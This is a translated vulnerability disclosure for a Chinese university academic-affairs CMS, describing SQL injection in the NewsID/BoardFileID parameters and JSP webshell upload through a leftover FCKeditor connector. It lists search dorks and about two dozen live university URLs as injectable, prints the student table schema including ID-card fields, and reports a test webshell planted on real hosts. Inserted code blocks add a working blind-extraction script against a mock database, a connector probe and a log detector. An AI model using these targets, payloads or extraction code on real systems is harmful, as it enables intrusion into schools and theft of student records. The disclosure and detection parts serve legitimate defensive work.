Vulnerability details

Disclosure status:

2014-03-20: Details reported to the vendor, awaiting vendor handling
2014-03-27: Vendor confirmed; details disclosed to the vendor only
2014-03-30: Details opened to third-party security partners
2014-04-06: Details opened to core white hats and domain experts
2014-04-16: Details opened to regular white hats
2014-05-06: Details opened to intern white hats
2014-05-04: Details opened to the public

Brief description:

Detailed description:

#1. This "JSP + Oracle" CMS is mainly used for the academic-affairs (教务) systems of universities and vocational/technical colleges, and quite a few universities (including the Academic Affairs Office of China Pharmaceutical University) run it. The system contains a SQL injection vulnerability and an arbitrary file upload vulnerability, so an attacker can not only inject into the database but also upload a JSP webshell. Google, Baidu, Sogou and the other search engines have crawled a large number of sites running this system.

Google or Baidu dorks:
inurl:ACTIONSHOWNEWS
inurl:ACTIONSHOWNEWS.APPPROCESS

#2. The main injection point is "ACTIONSHOWNEWS.APPPROCESS?mode=2&NewsID=", where the NewsID parameter is injectable. Twenty-odd sites running this system are listed below for CNCERT to test.

http://jw.bhcy.cn/ACTIONSHOWNEWS.APPPROCESS?mode=2&NewsID=261 
http://jwcweb.lnpu.edu.cn:7001/ACTIONSHOWNEWS.APPPROCESS?mode=2&NewsID=1361
http://fzyjwc.com/ACTIONSHOWNEWS.APPPROCESS?mode=2&NewsID=1521
http://ea.lnutcm.edu.cn/ACTIONSHOWNEWS.APPPROCESS?mode=2&NewsID=2381
http://edu.jnvc.cn/ACTIONSHOWNEWS.APPPROCESS?mode=2&NewsID=4023
http://218.61.108.163/ACTIONSHOWNEWS.APPPROCESS?mode=2&NewsID=124
http://jwc.sau.edu.cn/ACTIONSHOWNEWS.APPPROCESS?mode=2&NewsID=1081
http://211.82.200.116:8000/ACTIONSHOWNEWS.APPPROCESS?mode=2&NewsID=244
http://jiaowu.dlufl.edu.cn/ACTIONSHOWNEWS.APPPROCESS?mode=2&NewsID=410
http://www1.hbjcxy.com/ACTIONSHOWNEWS.APPPROCESS?mode=2&NewsID=181
http://www.vtcsy.com:8080/ACTIONSHOWNEWS.APPPROCESS?mode=2&NewsID=61
http://cityjw.dlut.edu.cn:7001/ACTIONSHOWNEWS.APPPROCESS?mode=2&NewsID=163
http://121.22.25.5/ACTIONSHOWNEWS.APPPROCESS?mode=2&NewsID=270
http://218.7.95.52:800/ACTIONSHOWNEWS.APPPROCESS?mode=2&NewsID=61
http://202.97.179.124:8000/ACTIONSHOWNEWS.APPPROCESS?mode=2&NewsID=1241
http://202.119.189.236:8085/ACTIONSHOWBOARD.APPPROCESS?mode=2&BoardFileID=2436
http://jwk.dlvtc.edu.cn/ACTIONSHOWNEWS.APPPROCESS?mode=2&NewsID=482
http://gz.syphu.edu.cn/ACTIONSHOWNEWS.APPPROCESS?mode=2&NewsID=301
http://jwgl.hrbcu.edu.cn/ACTIONSHOWNEWS.APPPROCESS?mode=2&NewsID=461
http://59.73.112.22/ACTIONSHOWNEWS.APPPROCESS?mode=2&NewsID=563
The following instances have not published any news items, so there is no ID to use:
http://123.233.253.163:8080/index.jsp
http://218.8.131.152:8888/ACTIONSHOWFILES.APPPROCESS?mode=1
http://202.198.129.163/
http://221.211.54.6/ACTIONSHOWFILES.APPPROCESS?mode=1





Injection proof, using the Academic Affairs Office of China Pharmaceutical University as the example (on this instance the same pattern is reached through ACTIONSHOWBOARD.APPPROCESS and its BoardFileID parameter):

http://202.119.189.236:8085/ACTIONSHOWBOARD.APPPROCESS?mode=2&BoardFileID=2436 and 1=1  -> page renders normally

[screenshot 01.jpg: "and 1=1", page renders normally]

http://202.119.189.236:8085/ACTIONSHOWBOARD.APPPROCESS?mode=2&BoardFileID=2436 and 1=2  -> page errors

[screenshot 02.jpg: "and 1=2", page errors]

600-plus tables in the schema:

[screenshot 03.jpg: table enumeration]



Table: BASE_STUDENT  <-- columns of the student table
[91 columns]
+------------------+----------+
| Column | Type |
+------------------+----------+
| BANKID | VARCHAR2 |
| BIRTHADDRESSNO | VARCHAR2 |
| BIRTHDATE | DATE |
| BLOODNO | VARCHAR2 |
| CLASSNO | VARCHAR2 |
| COLLEGENO | VARCHAR2 |
| COMEDATE | DATE |
| COMEYEAR | NUMBER |
| CONVERSTATUSNO | VARCHAR2 |
| COUNTRYNO | VARCHAR2 |
| CREDITSTATUSNO | VARCHAR2 |
| DEGREELETTERNO | VARCHAR2 |
| DEGREENO | VARCHAR2 |
| DEPARTMENT | VARCHAR2 |
| DEPTNO | VARCHAR2 |
| DISPLOMANO | VARCHAR2 |
| ECARDPASS | VARCHAR2 |
| EMAILADDRESS | VARCHAR2 |
| ENGLISHNAME | VARCHAR2 |
| EXAMNO | VARCHAR2 |
| FAITHNO | VARCHAR2 |
| FILE_CARD | VARCHAR2 |
| FOREIGNLANGUAGE | VARCHAR2 |
| FOREIGNLANLEVEL | VARCHAR2 |
| GRADEYEAR | NUMBER |
| GRADUATENO | VARCHAR2 |
| HEALTHNO | VARCHAR2 |
| HKNO | VARCHAR2 |
| ID | NUMBER |
| ID_CARD | VARCHAR2 |
| IDKINDNO | VARCHAR2 |
| IFGRADUATE | NUMBER |
| IFHAVEDEGREE | NUMBER |
| INPOS | VARCHAR2 |
| ISTEACHMODIFY | NUMBER |
| LETTERMODENO | VARCHAR2 |
| LIBRARY_CARD | VARCHAR2 |
| LIVEROOM | VARCHAR2 |
| MAILADDRESS | VARCHAR2 |
| MAJORDIRECTIONNO | VARCHAR2 |
| MAJORLEVEL | VARCHAR2 |
| MAJORNO | VARCHAR2 |
| MAJORSUBJECTNO | VARCHAR2 |
| MARRYNO | VARCHAR2 |
| MEMOS | VARCHAR2 |
| NAME | VARCHAR2 |
| NATIVE | VARCHAR2 |
| NATIVENO | VARCHAR2 |
| NOCHECKREASON | VARCHAR2 |
| NODEGREEREASON | VARCHAR2 |
| NOWADDRESS | VARCHAR2 |
| OPERNO | VARCHAR2 |
| OPERTIME | DATE |
| POLITICALID | VARCHAR2 |
| POSTALCODE | VARCHAR2 |
| RACEID | VARCHAR2 |
| RECRUITNO | VARCHAR2 |
| REGISTPLACE | VARCHAR2 |
| REGSTATUS | NUMBER |
| RICE_CARD | VARCHAR2 |
| SEASONNO | VARCHAR2 |
| SEX | VARCHAR2 |
| SEXID | VARCHAR2 |
| SORTGRADE | NUMBER |
| SPECIALPOWER | VARCHAR2 |
| SPECNO | VARCHAR2 |
| SPELLNAME | VARCHAR2 |
| STUDENTID | VARCHAR2 |
| STUDENTNAME | VARCHAR2 |
| STUDENTNO | VARCHAR2 |
| STUDENTNOCW | VARCHAR2 |
| STUDENTNOOLD | VARCHAR2 |
| STUDENTSTATUS | NUMBER |
| STUDENTTYPENO | VARCHAR2 |
| STUDYDIRECTNO | VARCHAR2 |
| STUFROMAREA | VARCHAR2 |
| STUHOMEPAGE | VARCHAR2 |
| STUPHOTO | BLOB |
| TEACHCLASSNO | VARCHAR2 |
| TELNO | VARCHAR2 |
| TOSTATION | VARCHAR2 |
| TRAINMODENO | VARCHAR2 |
| TUTORNO | VARCHAR2 |
| USEDNAME | VARCHAR2 |
| XKENDTIME | DATE |
| XKFORCESELECTED | NUMBER |
| XKIFENABLE | NUMBER |
| XKPHASENO | VARCHAR2 |
| XKSTARTTIME | DATE |
| XSBAT | VARCHAR2 |
| YEARLIMIT | NUMBER |
+------------------+----------+
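The boolean differential shown in the screenshots above ("and 1=1" renders, "and 1=2" errors) is the whole oracle an attacker needs to read tables such as BASE_STUDENT. The following is an added example, not code from the report or from the CMS vendor: it stands in for the vulnerable JSP handler with an in-memory SQLite database (the real backend is Oracle; substr() and the payload shape are the same in both, and the mock returns "no row" where the real page throws an error), shows the 1=1/1=2 check, extracts a STUDENTNO from a mock BASE_STUDENT table one character at a time, and shows the parameter-binding fix. The table and column names come from the sqlmap listing above; the row contents, SECRET_STUDENTNO and all function names are made up.

```python
import re
import sqlite3
import string

# Constructed test data: one news row and one BASE_STUDENT row. Column names
# follow the sqlmap listing in the report; the values are invented.
SECRET_STUDENTNO = "2013045678"


def make_db() -> sqlite3.Connection:
    db = sqlite3.connect(":memory:")
    db.executescript(
        """
        CREATE TABLE NEWS (NEWSID INTEGER PRIMARY KEY, TITLE TEXT);
        INSERT INTO NEWS VALUES (2436, 'Exam schedule');
        CREATE TABLE BASE_STUDENT (ID INTEGER, STUDENTNO TEXT, NAME TEXT, ID_CARD TEXT);
        INSERT INTO BASE_STUDENT VALUES (1, '2013045678', 'Zhang San', '320102199501011234');
        """
    )
    return db


def show_news_vulnerable(db: sqlite3.Connection, news_id: str):
    """Mock of ACTIONSHOWNEWS.APPPROCESS?mode=2&NewsID=...: the parameter is
    concatenated straight into the WHERE clause, so 'and 1=1' / 'and 1=2'
    change the result and an unbalanced payload raises a database error."""
    sql = "SELECT TITLE FROM NEWS WHERE NEWSID=" + news_id
    row = db.execute(sql).fetchone()
    return row[0] if row else None


def show_news_hardened(db: sqlite3.Connection, news_id: str):
    """Fixed handler: reject anything that is not a plain integer, then bind
    the value instead of concatenating it (PreparedStatement in JSP terms)."""
    if not re.fullmatch(r"\d{1,10}", news_id):
        raise ValueError("NewsID must be an integer")
    row = db.execute("SELECT TITLE FROM NEWS WHERE NEWSID=?", (int(news_id),)).fetchone()
    return row[0] if row else None


def hardened_rejects(db: sqlite3.Connection, news_id: str) -> bool:
    """True when the hardened handler refuses the input."""
    try:
        show_news_hardened(db, news_id)
    except ValueError:
        return True
    return False


def page_is_normal(db: sqlite3.Connection, news_id: str) -> bool:
    """Boolean oracle: True when the page would render the news item."""
    try:
        return show_news_vulnerable(db, news_id) is not None
    except sqlite3.Error:
        return False


def is_injectable(db: sqlite3.Connection, base_id: str) -> bool:
    """The 1=1 / 1=2 differential from the report's screenshots."""
    return page_is_normal(db, f"{base_id} and 1=1") and not page_is_normal(db, f"{base_id} and 1=2")


def blind_extract(db: sqlite3.Connection, base_id: str, subquery: str, max_len: int = 32) -> str:
    """Character-by-character boolean-based extraction of a scalar subquery.
    Stops at the first position where no character of the charset matches."""
    charset = string.digits + string.ascii_uppercase + string.ascii_lowercase + "_"
    out = ""
    for pos in range(1, max_len + 1):
        for ch in charset:
            payload = f"{base_id} and substr(({subquery}),{pos},1)='{ch}'"
            if page_is_normal(db, payload):
                out += ch
                break
        else:
            break  # end of string
    return out


if __name__ == "__main__":
    db = make_db()
    print("injectable:", is_injectable(db, "2436"))
    print("STUDENTNO:", blind_extract(db, "2436", "select STUDENTNO from BASE_STUDENT where ID=1"))
    print("hardened rejects payload:", hardened_rejects(db, "2436 and 1=1"))
```

The extraction issues at most len(charset) requests per character; against a real Oracle backend the same substr() payload would be sent through NewsID or BoardFileID, which is exactly why a purely numeric parameter must be type-checked and bound rather than concatenated.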



I didn't go any deeper; there is too much and I couldn't be bothered to dump it all. The admin backend seems to be:

http://edu.***.com/Main.jsp

[screenshot 09.jpg: admin backend login]

Vulnerability proof:

#3. As for the arbitrary file upload in this system: most administrators were smart enough to remove it, but some instances still ship the FCKeditor editor, which allows arbitrary JSP webshells to be uploaded. Editor vulnerability URL:

http://edu.***.cn/FCKeditor/editor/filemanager/browser/default/browser.html?connector=./connectors/jsp/connector

For example:

[screenshot 04.jpg]

[screenshot 05.jpg]

[screenshot 06.jpg]

[screenshot 07.jpg]





#4. Wherever there's an editor it's a racetrack (already trampled by other people's shells)! Below is the test shell:

[screenshot 08.jpg: test shell]
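The file-browser URL above hands the connector path to browser.html, so the connector itself answers at .../browser/default/connectors/jsp/connector and takes its commands as query parameters. As an added example (not the report's or FCKeditor's own code), the following builds those connector requests and parses the XML a live connector returns, so an operator can decide whether a forgotten editor is still exposing the upload directory and whether server-side scripts already sit in it. The base URL, the sample responses and the file name list are constructed; the command and parameter names (Command, Type, CurrentFolder, NewFolderName) are FCKeditor's own.

```python
import urllib.request
import xml.etree.ElementTree as ET
from urllib.parse import urlencode, urljoin

# Connector path implied by the editor URL in the report (host elided there).
CONNECTOR_PATH = "FCKeditor/editor/filemanager/browser/default/connectors/jsp/connector"
SERVER_SCRIPT_EXTS = {"jsp", "jspx", "jspf", "jsw", "jsv"}


def connector_url(base: str, command: str = "GetFoldersAndFiles",
                  resource_type: str = "File", current_folder: str = "/") -> str:
    """Build a connector request. Command/Type/CurrentFolder are the
    connector's query interface; CreateFolder additionally takes NewFolderName."""
    query = urlencode({"Command": command, "Type": resource_type, "CurrentFolder": current_folder})
    return urljoin(base, CONNECTOR_PATH) + "?" + query


def parse_connector_response(body: str) -> dict:
    """Parse the connector's XML: a <Connector> root carrying either an
    <Error number=...> or <CurrentFolder> plus <Folders>/<Files> lists."""
    root = ET.fromstring(body)
    if root.tag != "Connector":
        raise ValueError("not a FCKeditor connector response")
    err = root.find("Error")
    cur = root.find("CurrentFolder")
    return {
        "command": root.get("command"),
        "error": int(err.get("number")) if err is not None else 0,
        "url": cur.get("url") if cur is not None else None,
        "folders": [f.get("name") for f in root.iterfind("Folders/Folder")],
        "files": [f.get("name") for f in root.iterfind("Files/File")],
    }


def assess(body: str) -> dict:
    """Exposed = the connector answered a listing without an error; also flag
    any file whose extension the container would execute as a JSP."""
    info = parse_connector_response(body)
    scripts = [n for n in info["files"]
               if "." in n and n.lower().rsplit(".", 1)[-1] in SERVER_SCRIPT_EXTS]
    return {**info,
            "exposed": info["error"] == 0 and info["url"] is not None,
            "server_scripts": scripts}


def probe(base: str, timeout: float = 10.0) -> dict:
    """Live, read-only check: one GetFoldersAndFiles request, nothing written."""
    with urllib.request.urlopen(connector_url(base), timeout=timeout) as resp:
        return assess(resp.read().decode("utf-8", "replace"))


# Constructed responses in the connector's format (not captured from a real host).
SAMPLE_LISTING = """<Connector command="GetFoldersAndFiles" resourceType="File">
  <CurrentFolder path="/" url="/UserFiles/File/"/>
  <Folders><Folder name="2014"/></Folders>
  <Files><File name="notice.doc" size="44"/><File name="zone.jsp" size="3"/></Files>
</Connector>"""

SAMPLE_ERROR = """<Connector command="CreateFolder" resourceType="File">
  <CurrentFolder path="/" url="/UserFiles/File/"/>
  <Error number="102"/>
</Connector>"""

if __name__ == "__main__":
    print(connector_url("http://edu.example.cn/"))
    print(assess(SAMPLE_LISTING))
    print(assess(SAMPLE_ERROR))
```

probe() only lists; it never sends FileUpload or CreateFolder. A non-zero Error number, an HTTP 404, or an authentication redirect all mean the connector is not reachable anonymously, which is the state the report says most administrators had already reached by deleting the editor.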



Fix recommendation:

PS: The test shell (zone.jsp) has been deleted. Looking around, everywhere there's an editor has already become a racetrack, so I feel this system has to be retired! Incidentally, perhaps CNCERT can find the student registration page, register a user and go in; there may be an upload vulnerability there too. I seem to have seen one before, but I forgot where.
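The report offers no remediation beyond retiring the system. Until that happens an operator of one of the listed instances needs to know whether the two paths above have already been used against it. As an added example (not from the report), the following walks combined-format access logs and tags, per client IP, non-numeric values in the two injectable parameters the report names (NewsID, BoardFileID), any request to the FCKeditor file-manager connector with its Command, and any JSP fetched from under the upload directory. The log lines are constructed for this example: the paths follow the report, the client IPs, timestamps and sizes are invented.

```python
import re
from urllib.parse import parse_qs, urlsplit

# Constructed combined-format lines (not from a real server).
SAMPLE_LOG = """\
10.0.0.5 - - [20/Mar/2014:10:01:02 +0800] "GET /ACTIONSHOWNEWS.APPPROCESS?mode=2&NewsID=261 HTTP/1.1" 200 5120
10.0.0.9 - - [20/Mar/2014:10:01:09 +0800] "GET /ACTIONSHOWNEWS.APPPROCESS?mode=2&NewsID=261%20and%201=2 HTTP/1.1" 500 812
10.0.0.9 - - [20/Mar/2014:10:01:15 +0800] "GET /ACTIONSHOWBOARD.APPPROCESS?mode=2&BoardFileID=2436%20and%201=1 HTTP/1.1" 200 5120
10.0.0.9 - - [20/Mar/2014:10:02:01 +0800] "GET /FCKeditor/editor/filemanager/browser/default/connectors/jsp/connector?Command=GetFoldersAndFiles&Type=File&CurrentFolder=/ HTTP/1.1" 200 640
10.0.0.9 - - [20/Mar/2014:10:02:30 +0800] "POST /FCKeditor/editor/filemanager/browser/default/connectors/jsp/connector?Command=FileUpload&Type=File&CurrentFolder=/ HTTP/1.1" 200 120
10.0.0.9 - - [20/Mar/2014:10:02:45 +0800] "GET /UserFiles/File/zone.jsp HTTP/1.1" 200 33
"""

LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>\S+) (?P<target>\S+) [^"]*" (?P<status>\d{3})'
)
# The two parameters the report shows being injected; both are integer IDs.
NUMERIC_PARAMS = ("NewsID", "BoardFileID")
UPLOAD_DIR_RE = re.compile(r"/userfiles/.*\.jsp\w*$", re.I)


def classify(line: str) -> list:
    """Return the list of indicator tags for one access-log line."""
    m = LOG_RE.match(line)
    if not m:
        return []
    url = urlsplit(m["target"])
    path = url.path
    params = parse_qs(url.query, keep_blank_values=True)  # percent-decodes values
    tags = []
    if path.upper().endswith(".APPPROCESS"):
        for name in NUMERIC_PARAMS:
            for value in params.get(name, []):
                if not value.isdigit():
                    tags.append(f"sqli-attempt:{name}")
    if "/fckeditor/editor/filemanager/" in path.lower():
        tags.append("fckeditor-connector:" + params.get("Command", ["?"])[0])
    if UPLOAD_DIR_RE.search(path):
        tags.append("jsp-under-upload-dir")
    return tags


def scan(log_text: str) -> dict:
    """Aggregate indicator tags per client IP, in log order."""
    by_ip = {}
    for line in log_text.splitlines():
        m = LOG_RE.match(line)
        tags = classify(line)
        if m and tags:
            by_ip.setdefault(m["ip"], []).extend(tags)
    return by_ip


if __name__ == "__main__":
    for ip, tags in scan(SAMPLE_LOG).items():
        print(ip, tags)
```

A single IP that moves from sqli-attempt through fckeditor-connector:FileUpload to a JSP under the upload directory is the sequence the report describes; the percent-decoding in parse_qs matters because "and 1=2" arrives as %20and%201=2 and would not be caught by a literal match on the raw request line.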

Copyright notice: please credit the source when reposting: U神@乌云


Vulnerability response

Vendor response:

Severity: High

Vulnerability Rank: 18

Confirmed: 2014-03-27 22:14

Vendor reply:

CNVD confirmed the situation described. Verification was carried out with the assistance of Shanghai Jiao Tong University, and based on the verification results CNVD has forwarded the report to the CERNET emergency response organization, 赛尔网络公司 (CERNET Corporation, under CCERT).

Latest status:

None yet


Vulnerability comments: